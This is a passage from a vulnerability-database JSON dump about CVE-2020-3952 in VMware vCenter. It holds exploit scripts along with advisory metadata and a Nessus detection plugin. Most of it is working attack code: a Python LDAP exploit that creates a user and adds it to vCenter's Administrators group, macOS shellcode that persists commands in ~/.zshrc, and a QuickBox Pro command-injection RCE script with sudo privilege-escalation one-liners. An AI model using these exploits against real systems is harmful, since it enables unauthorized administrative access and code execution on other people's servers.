b'30') + sAttributes\r\n sPacket = sUserEntry + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n #print(sPacket)\r\n return binascii.unhexlify(sPacket)\r\n\r\ndef buildModifyUserPacket(sUser):\r\n sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode())\r\n sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local')\r\n sMember = binascii.hexlify(b'member')\r\n ## Packet Construction\r\n sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN\r\n sPacket = getLengthPrefix(sPacket, b'31') + sPacket\r\n sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n #print(sPacket)\r\n return binascii.unhexlify(sPacket)\r\n\r\ndef performBind(s):\r\n ## Trying to bind, fails, but necessary (even fails when using correct credentials)\r\n dPacket = buildBindRequestPacket('[email\u00a0protected]','www.IC4.be')\r\n s.send(dPacket)\r\n sResponse = s.recv(1024)\r\n try:\r\n sResponse = sResponse.split(b'\\x04\\x00')[0][-1:]\r\n sCode = binascii.hexlify(sResponse).decode()\r\n if sCode == '31': print('[+] Ok, service reachable, continuing')\r\n else: print('[-] Something went wrong')\r\n except:\r\n pass\r\n return sCode\r\n\r\ndef performUserAdd(s, sUser, sPass):\r\n dPacket = buildUserCreatePacket(sUser,sPass)\r\n s.send(dPacket)\r\n sResponse = s.recv(1024)\r\n try:\r\n sCode = sResponse.split(b'\\x04\\x00')[0][-1:]\r\n sMessage = sResponse.split(b'\\x04\\x00')[1]\r\n if sCode == b'\\x00':\r\n print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass)\r\n elif sCode == b'\\x32':\r\n print('[-] Error, this host is not vulnerable (insufficientAccessRights)')\r\n else:\r\n if sMessage[2] == b'81': sMessage = sMessage[3:].decode()\r\n else: sMessage = sMessage[2:].decode()\r\n print('[-] Error, user not added, message received: ' + sMessage)\r\n except:\r\n pass\r\n return sCode\r\n \r\n\r\ndef performUserMod(s, sUser, verbose = True):\r\n dPacket = buildModifyUserPacket(sUser)\r\n s.send(dPacket)\r\n sResponse = s.recv(1024)\r\n try:\r\n sCode = sResponse.split(b'\\x04\\x00')[0][-1:]\r\n sMessage = sResponse.split(b'\\x04\\x00')[1]\r\n if sCode == b'\\x00':\r\n if verbose: print('[+] User modification success (if the above is OK).')\r\n else:\r\n if sMessage[2] == b'81': sMessage = sMessage[3:].decode()\r\n else: sMessage = sMessage[2:].decode()\r\n if verbose: print('[-] Error during modification, message received: ' + sMessage)\r\n except:\r\n pass\r\n return sCode, sMessage\r\n\r\ndef performUnbind(s):\r\n try: s.send(b'\\x30\\x05\\x02\\x01\\x04\\x42\\x00')\r\n except: pass\r\n\r\ndef main():\r\n global _sIP, _iPORT, _iTIMEOUT\r\n _sUSER = 'user_' + randomString(6)\r\n _sPASS = randomString(8) + '_2020'\r\n bAdduser = False\r\n if len(sys.argv) == 1:\r\n print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]')\r\n print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS)\r\n print(' Leave username & password empty for a vulnerability check')\r\n print(' Watch out for vCenter/LDAP password requirements, leave empty for random password')\r\n print(' But for now, I will ask questions')\r\n sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ')\r\n if not sAnswer == '': _sIP = sAnswer\r\n sAnswer = input('[?] Want to perform a check only? [Y/n]: ')\r\n if sAnswer.lower() == 'n': bAdduser = True\r\n if bAdduser:\r\n sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ')\r\n if not sAnswer == '': _sUSER = sAnswer\r\n sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ')\r\n if not sAnswer == '': _sPASS = sAnswer\r\n else:\r\n _sIP = sys.argv[1]\r\n if len(sys.argv) >= 3:\r\n _sUSER = sys.argv[2]\r\n bAdduser = True\r\n if len(sys.argv) >= 4: _sPASS = sys.argv[3]\r\n\r\n ## MAIN\r\n print('')\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.settimeout(_iTIMEOUT)\r\n try:\r\n s.connect((_sIP,_iPORT))\r\n except:\r\n print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable')\r\n sys.exit(1)\r\n\r\n performBind(s)\r\n\r\n if bAdduser:\r\n sCode = performUserAdd(s, _sUSER, _sPASS)\r\n\r\n if not bAdduser:\r\n print('[!] Checking vulnerability')\r\n sCode, sMessage = performUserMod(s, 'Administrator', False)\r\n if sCode == b'\\x32': print('[-] This host is not vulnerable, message: ' + sMessage)\r\n else: print('[+] This host is vulnerable!')\r\n else:\r\n sCode = performUserMod(s, _sUSER)\r\n \r\n performUnbind(s)\r\n \r\n s.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2020-07-19] #", "sourceHref": "https://0day.today/exploit/34499", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-06-16T15:31:47", "description": "The version of VMware vCenter Server installed on the remote host is 6.7 prior to U3F, and is, therefore, affected by an information disclosure vulnerability caused by insufficient access controls in vmdir. This allows an attacker with network access to an affected vmdir deployment may be able to extract highly sensitive information. This information can be used to compromise the vCenter Server or other services which depends on VMware directory service authentication. (CVE-2020-3952) Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-13T00:00:00", "type": "nessus", "title": "VMware vCenter Server 6.7 Sensitive Information Disclosure Vulnerability (VMSA-2020-0006)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2022-01-24T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_VMSA-2020-0006.NASL", "href": "https://www.tenable.com/plugins/nessus/135411", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135411);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2020-3952\");\n script_xref(name:\"VMSA\", value:\"2020-0006\");\n script_xref(name:\"IAVA\", value:\"2020-A-0136-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"VMware vCenter Server 6.7 Sensitive Information Disclosure Vulnerability (VMSA-2020-0006)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host is affected by a\nsensitive information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 6.7 prior\nto U3F, and is, therefore, affected by an information disclosure vulnerability caused by\ninsufficient access controls in vmdir. This allows an attacker with network access to an \naffected vmdir deployment may be able to extract highly sensitive information. This information\ncan be used to compromise the vCenter Server or other services which depends on VMware directory \nservice authentication. (CVE-2020-3952)\n \nNote that Nessus has not tested for these issues but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2020-0006.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 6.7 U3F or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3952\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nport = get_kb_item_or_exit('Host/VMware/vCenter');\nversion = get_kb_item_or_exit('Host/VMware/version');\nrelease = get_kb_item_or_exit('Host/VMware/release');\n\n# Extract and verify the build number\nbuild = ereg_replace(pattern:'^VMware vCenter Server [0-9\\\\.]+ build-([0-9]+)$', string:release, replace:\"\\1\");\nif (build !~ '^[0-9]+$') exit(1, 'Failed to extract the build number from the release string.');\n\nrelease = release - 'VMware vCenter Server ';\nfixversion = NULL;\n\n# Check version and build numbers\n# 6.7 U3 https://docs.vmware.com/en/VMware-vSphere/6.7/rn/vsphere-vcenter-server-67u3f-release-notes.html\nif(version =~ '^VMWare vCenter 6\\\\.7$' && int(build) < 15976714) fixversion = '6.7.0 build-15976714';\nelse audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release);\n\nreport = report_items_str(\n report_items:make_array(\n 'Installed version', release,\n 'Fixed version', fixversion\n ),\n ordered_fields:make_list('Installed version', 'Fixed version')\n);\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server Info Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-3952", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-07-13T16:20:19", "description": "Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-10T14:15:00", "type": "cve", "title": "CVE-2020-3952", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.7"], "id": "CVE-2020-3952", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-3952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*"]}], "0daydb": [{"lastseen": "2020-06-23T13:12:54", "description": "198 bytes small macOS/x64 RickRolling shellcode.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-02T13:54:55", "title": "macOS/x64 zsh RickRolling - Shellcode", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952", "CVE-2020-13693"], "modified": "2020-06-02T13:54:55", "id": "0DAYDB:86305C86483A99E3E27347A2CBC3B02C", "href": "https://0daydb.com/macos-x64-zsh-rickrolling-shellcode.html", "sourceData": "/*\n## Shellcode Title: macOS/x64 - zsh RickRolling Shellcode (198 Bytes)\n## Shellcode Author: Bobby Cooke\n## Date: May 31st, 2020\n## Tested on: macOS Catalina v10.15.4\n## Shellcode Description:\n## MacOS Catalina Dynamic, No-Null Shellcode that will Unmute the systems Volume, set the Volume to Maximum, and \"Rick Roll\" the user every time they open a Z-Shell Terminal Window. \n## The shellcode uses the UNIX ExecVE SysCall to spawn a UNIX SH (/bin/sh). The UNIX SH executes an Echo (/bin/echo) command that adds two commands to the users Z-Shell (zsh) Running Config File (~/.zshrc); the ~/.zshrc file will be created if it does not exist. The first command in the ~/.zshrc file leverages the macOS default system binary OSAScript (/usr/bin/osascript) too unmute the macOS system & set the volume too maximum. The second command in the ~/.zshrc file leverages the macOS default system binary Open (/usr/bin/open) to open the 'Rick Astley - Never Gonna Give You Up' video with the macOS systems default browser.\n## C Compile: gcc zsh-rickrolling.c -o zsh-rickrolling\n## Apple clang version 11.0.3 (clang-1103.0.32.62)\n## Compile & Test:\n## root# gcc zsh-rickrolling.c -o zsh-rickrolling\n## root# cat ~/.zshrc\n## cat: /var/root/.zshrc: No such file or directory\n## root# ./zsh-rickrolling\n## Shellcode Length: 198 Bytes\n## root# cat ~/.zshrc\n## osascript -e \"set Volume 9\"\n## open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\"\n## root# zsh\n## [email\u00a0protected] #\n## < Browser Pop & Rick Roll >\n\n---------------------------------------------------------------------\n\n;## ASM Compile: nasm -f macho64 zsh-rickrolling.asm\n;## NASM version 2.14.02 compiled on Sep 28 2019\n;## OBJ Link: ld zsh-rickrolling.o -lSystem -o zsh-rickrolling\n;## BUILD 17:57:49 Apr 24 2020\n;## Get SC: /bin/bash for x in $(objdump -d zsh-rickrolling.o -x86-asm-syntax=intel | grep \"^ \" | cut -f1 | awk -F: '{print $2}'); do echo -n \"\\x\"$x; done; echo\nglobal _main\n_main:\n; execve(const char *path, char *const argv[], char *const envp[]);\n; RAX RDI RSI RDX\n; RAX = 0x200003b = Execve System Call Number\n; RDI = &\"/bin/sh\\x00\"\n; RSI = RSP\n; [RSP+10] = argv[0] = &`/bin/sh\\x00`\n; [RSP+8] = argv[1] = &`-c\\x00`\n; [RSP+0] = argv[2] = &`echo \"open 'https...\n; RDX = 0x0\nregclear:\nxor rsi, rsi ; rsi = 0x0\nmul rsi ; rax & rdx = 0x0\nargv0:\nmov rcx, 0x68732f6e69622fff ; \"\\xff/bin/sh\"\nshr rcx, 0x8 ; \"/bin/sh\\x00\"\npush rcx ; rsp = &\"/bin/sh\\x00\"\nmov rdi, rsp ; rdi = *path = &\"/bin/sh\\x00\"\nargv1:\nadd dx, 0x632d ; \"-c\\x00\"\npush rdx ; rsp = &\"-c\\x00\"\nmov rbx, rsp ; rbx = &\"-c\\x00\"\nargv2:\n; \"echo 'osascript -e \\\"set Volume 9\\\"\\r\\nopen \\\"https://www.youtube.com/watch?v=dQw4w9WgXcQ\\\"' >> ~/.zshrc\"\n; String length : 98\nxor rcx, rcx\nadd cx, 0x6372 ; cr\npush rcx\nmov rcx, 0x68737a2e2f7e203e ; hsz./~ >\npush rcx\nmov rcx, 0x3e20272251635867 ; > '\"QcXg\npush rcx\nmov rcx, 0x573977347751643d ; W9w4wQd=\npush rcx\nmov rcx, 0x763f68637461772f ; v?hctaw/\npush rcx\nmov rcx, 0x6d6f632e65627574 ; moc.ebut\npush rcx\nmov rcx, 0x756f792e7777772f ; uoy.www/\npush rcx\nmov rcx, 0x2f3a737074746822 ; /:sptth\"\npush rcx\nmov rcx, 0x206e65706f0A0D22 ; nepo\\n\\r\"\npush rcx\nmov rcx, 0x3920656d756c6f56 ; 9 emuloV\npush rcx\nmov rcx, 0x207465732220652d ; tes\" e-\npush rcx\nmov rcx, 0x2074706972637361 ; tpircsa\npush rcx\nmov rcx, 0x736f27206f686365 ; so' ohce\npush rcx\nmov r9, rsp ; r9 = &`echo \"open 'https...\nloadArgv:\nxor rdx, rdx ; rdx = envp[] = 0x0\npush rdx ; [RSP+18] = 0x0\npush r9 ; [RSP+10] = argv[2] = &Command String\npush rbx ; [RSP+8] = argv[1] = &`-c\\x00`\npush rdi ; [RSP+0] = argv[0] = &`/bin/sh\\x00`\nmov rsi, rsp ; rsi = argv[]\nexecve:\nmov al,2 ; rax = 0x2\nror rax, 0x28 ; rax = 0x2000000\nmov al, 0x3b ; rax = 0x200003b\nsyscall ; execve system call\n\n---------------------------------------------------------------------\n\n*/\n\n#include <stdio.h>\n#include <sys/mman.h>\n#include <string.h>\n#include <stdlib.h>\n\nint (*sc)();\n\nchar shellcode[] =\n \"\\x48\\x31\\xf6\\x48\\xf7\\xe6\\x48\\xb9\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\"\n \"\\xc1\\xe9\\x08\\x51\\x48\\x89\\xe7\\x66\\x81\\xc2\\x2d\\x63\\x52\\x48\\x89\\xe3\\x48\"\n \"\\x31\\xc9\\x66\\x81\\xc1\\x72\\x63\\x51\\x48\\xb9\\x3e\\x20\\x7e\\x2f\\x2e\\x7a\\x73\"\n \"\\x68\\x51\\x48\\xb9\\x67\\x58\\x63\\x51\\x22\\x27\\x20\\x3e\\x51\\x48\\xb9\\x3d\\x64\"\n \"\\x51\\x77\\x34\\x77\\x39\\x57\\x51\\x48\\xb9\\x2f\\x77\\x61\\x74\\x63\\x68\\x3f\\x76\"\n \"\\x51\\x48\\xb9\\x74\\x75\\x62\\x65\\x2e\\x63\\x6f\\x6d\\x51\\x48\\xb9\\x2f\\x77\\x77\"\n \"\\x77\\x2e\\x79\\x6f\\x75\\x51\\x48\\xb9\\x22\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x51\"\n \"\\x48\\xb9\\x22\\x0d\\x0a\\x6f\\x70\\x65\\x6e\\x20\\x51\\x48\\xb9\\x56\\x6f\\x6c\\x75\"\n \"\\x6d\\x65\\x20\\x39\\x51\\x48\\xb9\\x2d\\x65\\x20\\x22\\x73\\x65\\x74\\x20\\x51\\x48\"\n \"\\xb9\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x20\\x51\\x48\\xb9\\x65\\x63\\x68\\x6f\\x20\"\n \"\\x27\\x6f\\x73\\x51\\x49\\x89\\xe1\\x48\\x31\\xd2\\x52\\x41\\x51\\x53\\x57\\x48\\x89\"\n \"\\xe6\\xb0\\x02\\x48\\xc1\\xc8\\x28\\xb0\\x3b\\x0f\\x05\";\n\nint main(int argc, char **argv) {\n printf(\"Shellcode Length: %zd Bytes\\n\", strlen(shellcode));\n\n void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);\n\n if (ptr == MAP_FAILED) {\n perror(\"mmap\");\n exit(-1);\n }\n\n memcpy(ptr, shellcode, sizeof(shellcode));\n sc = ptr;\n\n sc();\n\n return 0;\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-23T13:12:55", "description": "CVE-2020-13448 QuickBox Pro versions 2.1.8 and below suffer from an authenticated remote code execution vulnerability.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-03T15:51:53", "title": "QuickBox Pro 2.1.8 CVE-2020-13448 - Remote Code Execution", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13448", "CVE-2020-12720", "CVE-2020-3952"], "modified": "2020-06-03T15:51:53", "id": "0DAYDB:605E9AABF85A309DCC2B08791CD8A47B", "href": "https://0daydb.com/quickbox-pro-2-1-8-cve-2020-13448-remote-code-execution.html", "sourceData": "# Exploit Title: QuickBox Pro 2.1.8 - Authenticated Remote Code Execution\n# Date: 2020-05-26\n# Exploit Author: s1gh\n# Vendor Homepage: https://quickbox.io/\n# Vulnerability Details: https://s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/\n# Version: <= 2.1.8\n# Description: An authenticated low-privileged user can exploit a command injection vulnerability to get code-execution as www-data and escalate privileges to root due to weak sudo rules.\n# Tested on: Debian 9\n# CVE: CVE-2020-13448\n# References: https://github.com/s1gh/QuickBox-Pro-2.1.8-Authenticated-RCE\n\n'''\nPrivilege escalation: After getting a reverse shell as the www-data user you can escalate to root in one of two ways.\n1. sudo mysql -e '\\! /bin/sh'\n2. sudo mount -o bind /bin/sh /bin/mount;sudo mount\n\n'''\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport requests\nimport argparse\nimport sys\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nfrom urllib.parse import quote_plus\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef exploit(args):\n s = requests.Session()\n print('[*] Sending our payload...')\n\n s.post('https://' + args.ip + '/inc/process.php', data={'username': args.username, 'password': args.password, 'form_submission': 'login'}, verify=False)\n try:\n s.get('https://' + args.ip + '/index.php?id=88&servicestart=a;' + quote_plus(args.cmd) + ';', verify=False)\n except requests.exceptions.ReadTimeout:\n pass\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Authenticated RCE for QuickBox Pro <= v2.1.8\")\n parser.add_argument('-i',dest='ip',required=True,help=\"Target IP Address\")\n parser.add_argument('-u',dest='username',required=True,help=\"Username\")\n parser.add_argument('-p',dest='password',required=True,help=\"Password\")\n parser.add_argument('-c',dest='cmd', required=True, help=\"Command to execute\")\n args = parser.parse_args()\n\n exploit(args)\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-23T13:12:54", "description": "CVE-2020-3952 VMware vCenter Server version 6.7 authentication bypass exploit.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-03T15:50:27", "title": "VMware vCenter Server 6.7 CVE-2020-3952 - Authentication Bypass", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13448", "CVE-2020-3592", "CVE-2020-3952"], "modified": "2020-06-03T15:50:27", "id": "0DAYDB:A820E9CE5C7A2E010E37B1EC1DAFD043", "href": "https://0daydb.com/vmware-vcenter-server-6-7-cve-2020-3952-authentication-bypass.html", "sourceData": "# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass\n# Date: 2020-06-01\n# Exploit Author: Photubias\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html\n# Version: vCenter Server 6.7 before update 3f\n# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0)\n# CVE: CVE-2020-3952\n\n#!/usr/bin/env python3\n\n'''\n Copyright 2020 Photubias(c) \n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see <http://www.gnu.org/licenses/>.\n \n Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952\n \n File name CVE-2020-3592.py\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\n \n ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x\n \n This is a native implementation without requirements, written in Python 3.\n Works equally well on Windows as Linux (as MacOS, probably ;-)\n\n Features: exploit + vulnerability checker\n'''\n\nimport binascii, socket, sys, string, random\n\n## Default vars; change at will\n_sIP = '192.168.50.35'\n_iPORT = 389\n_iTIMEOUT = 5\n\ndef randomString(iStringLength=8):\n #sLetters = string.ascii_lowercase\n sLetters = string.ascii_letters\n return ''.join(random.choice(sLetters) for i in range(iStringLength))\n\ndef getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified\n ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed\n sReturn = sPrefix\n if (len(sData) / 2 ) > 255:\n sReturn += b'82'\n hexBytes = 2\n elif (len(sData) /2 ) >= 128:\n sReturn += b'81'\n sReturn += f\"{int(len(sData)/2):#0{(hexBytes*2)+2}x}\"[2:].encode()\n return sReturn\n\ndef buildBindRequestPacket(sUser, sPass):\n sUser = binascii.hexlify(sUser.encode())\n sPass = binascii.hexlify(sPass.encode())\n ## Packet Construction\n sPacket = 